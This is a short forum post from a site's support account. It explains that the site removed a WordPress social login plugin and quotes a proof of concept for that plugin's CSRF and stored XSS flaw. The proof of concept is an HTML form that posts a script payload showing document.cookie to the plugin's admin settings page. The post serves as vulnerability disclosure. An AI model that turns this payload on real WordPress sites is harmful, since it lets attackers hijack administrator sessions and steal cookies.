CSRF/Cross-Site Scripting (XSS) Vulnerability in WordPress Social Login QUE.com › Forums › 30 – Cyber Security › CSRF/Cross-Site Scripting (XSS) Vulnerability in WordPress Social Login Tagged: social vulnerability This topic contains 0 replies, has 1 voice, and was last updated by Support @QUE.COM 2 weeks, 6 days ago. Viewing 1 post (of 1 total) Author Posts August 29, 2019 at 12:01 pm #27361 Support @QUE.COMKeymaster I removed the WordPress Social Login to our website due to vulnerability. Proof of Concept The following proof of concept will cause an alert box with the any available cookies to be shown when visiting the plugin’s admin page, /wp-admin/admin.php?page=mo_openid_settings. Make sure to replace “[path to WordPress]” with the location of WordPress. <html> <body> <form action="http://[path to WordPress]/wp-admin/admin.php?page=mo_openid_settings" method="POST"> <input type="hidden" name="option" value="mo_openid_enable_apps" /> <input type="hidden" name="mo_openid_login_widget_customize_text" value='"><script>alert(document.cookie);</script>' /> <input type="submit" value="Submit" /> </form> </body> </html> Read this article. https://www.pluginvulnerabilities.com/2019/04/01/csrf-cross-site-scripting-xss-vulnerability-in-social-login-social-sharing-by-miniorange-wordpress-social-login-facebook-google-twitter/ You can still login to our website using your existing account, retrieve a new password and it will be send to your email address on file. Be safe in the wild wild Internet. Author Posts Viewing 1 post (of 1 total) You must be logged in to reply to this topic.